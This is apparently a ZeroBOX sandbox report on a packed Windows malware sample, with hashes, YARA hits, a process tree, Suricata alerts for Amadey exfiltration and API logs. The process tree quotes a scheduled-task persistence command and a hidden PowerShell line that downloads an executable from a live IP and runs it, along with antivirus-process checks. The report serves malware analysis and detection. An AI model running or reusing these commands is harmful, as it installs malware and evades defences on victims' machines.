Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 11, 2025, 10:39 a.m.	Feb. 11, 2025, 10:47 a.m.

Size	938.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`655ea6038564b40a3c583e516c9033d3`
SHA256	`31539950849dc368724cfd1de99fe7be5367be6e48812eca784ba3acb9752d39`
CRC32	`8B3FA4B5`
ssdeep	`24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8ayIF:zTvC/MTQYxsWR7ayI`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file

random.exe "C:\Users\test22\AppData\Local\Temp\random.exe"
2560
- cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
  2624
  - schtasks.exe schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
    2728
- mshta.exe mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta
  2668
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
    2828
    - TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE "C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE"
      3024
      - skotes.exe "C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe"
        2192
        
        790548e77c.exe "C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe"
        2592
        
        790548e77c.exe "C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe"
        2760
        
        13Z5sqy.exe "C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        2792
        
        jonbDes.exe "C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe"
        3004
        
        tYrnx75.exe "C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe"
        3064
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
        2188
        
        findstr.exe findstr /I "opssvc wrsa"
        2204
        
        tasklist.exe tasklist
        2108
        
        tasklist.exe tasklist
        1064
        
        findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        2644
        
        cmd.exe cmd /c md 764661
        740
        
        extrac32.exe extrac32 /Y /E Fm
        2804
        
        findstr.exe findstr /V "Tunnel" Addresses
        2984
        
        cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
        3036
        
        cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
        1484
        
        Macromedia.com Macromedia.com F
        1728
        
        choice.exe choice /d y /t 15
        828
        
        up7d8Ym.exe "C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe"
        2084
        
        up7d8Ym.exe "C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe"
        2696
        
        012Bdpb.exe "C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe"
        2744
        
        7fOMOTQ.exe "C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe"
        2056
        
        Bjkm5hE.exe "C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
        3028
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.215.113.16	Active	Moloch
185.215.113.43	Active	Moloch
185.215.113.75	Active	Moloch
62.210.113.223	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.16:80 -> 192.168.56.101:49167	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 192.168.56.101:49167 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.101:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.43:80 -> 192.168.56.101:49172	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.75:80 -> 192.168.56.101:49173	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 185.215.113.43:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 185.215.113.75:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:40 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (38 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 11, 2025, 10:39 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:39 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0
IsDebuggerPresent Feb. 11, 2025, 10:40 a.m.			0	0

Command line console output was observed (50 out of 1182 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 11, 2025, 10:39 a.m.	buffer: SUCCESS: The scheduled task "X0P6emaCZCT" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: Set console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: Challenged=M console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: XfAp-Unified-Librarian- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'XfAp-Unified-Librarian-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: XAKAhead-Winter-Bestiality-Courtesy-Sorted-Essays- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'XAKAhead-Winter-Bestiality-Courtesy-Sorted-Essays-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: TrJnEllen-Ways-Geometry- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'TrJnEllen-Ways-Geometry-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: chhProjected-Citizens-Exclusion- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'chhProjected-Citizens-Exclusion-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: fAHuRand-Site-Inclusion-Model-Consideration-Nov-Advances- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'fAHuRand-Site-Inclusion-Model-Consideration-Nov-Advances-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: rvdValidation- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'rvdValidation-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: dnqBaby-Media-Casa-Vietnam-Probability-Deutsche-Gradually-Terminology-Subscription- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'dnqBaby-Media-Casa-Vietnam-Probability-Deutsche-Gradually-Terminology-Subscription-' is not recognized as an internal or external command, operable program or console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: Set console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: Hwy=m console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: rqSpam-Printable-Ceremony-Richmond-Priced-Interests-Additional-Sprint- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'rqSpam-Printable-Ceremony-Richmond-Priced-Interests-Additional-Sprint-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: nHRPink-Supplemental-Villas-Harassment-Focal- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'nHRPink-Supplemental-Villas-Harassment-Focal-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: yXbDraws- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'yXbDraws-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: ZrXProcesses-Er-Collector- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'ZrXProcesses-Er-Collector-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: JPQxReveal-Dow-Unavailable-Southern-Fixes- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'JPQxReveal-Dow-Unavailable-Southern-Fixes-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: xwLSimultaneously- console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: 'xwLSimultaneously-' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:40 a.m.	buffer: pYCUGospel-Organize-Sure-Er-Projector-Growth-Ascii-Moisture-Qualified- console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00340f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00341b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 11, 2025, 10:39 a.m.		1	1	0

One or more processes crashed (50 out of 524 events)

Time & API	Arguments	Status
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x30e0b9 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 3203257 exception.address: 0xbce0b9 registers.esp: 2685944 registers.edi: 0 registers.eax: 1 registers.ebp: 2685960 registers.edx: 14065664 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 81 c6 4b b6 36 3b 55 51 c7 04 24 aa 84 7f 7b exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6d569 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 447849 exception.address: 0x92d569 registers.esp: 2685908 registers.edi: 1968898280 registers.eax: 32672 registers.ebp: 3999641620 registers.edx: 9175040 registers.ebx: 0 registers.esi: 9620876 registers.ecx: 1969094656	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 50 52 e9 48 03 00 00 89 14 24 ba 80 1d 57 13 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6cf61 exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 446305 exception.address: 0x92cf61 registers.esp: 2685912 registers.edi: 1968898280 registers.eax: 32672 registers.ebp: 3999641620 registers.edx: 9175040 registers.ebx: 0 registers.esi: 9653548 registers.ecx: 1969094656	1
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: fb 57 89 04 24 52 89 e2 81 c2 04 00 00 00 55 e9 exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x6d67e exception.instruction: sti exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 448126 exception.address: 0x92d67e registers.esp: 2685912 registers.edi: 1968898280 registers.eax: 234729 registers.ebp: 3999641620 registers.edx: 9175040 registers.ebx: 4294937840 registers.esi: 9653548 registers.ecx: 1969094656	1
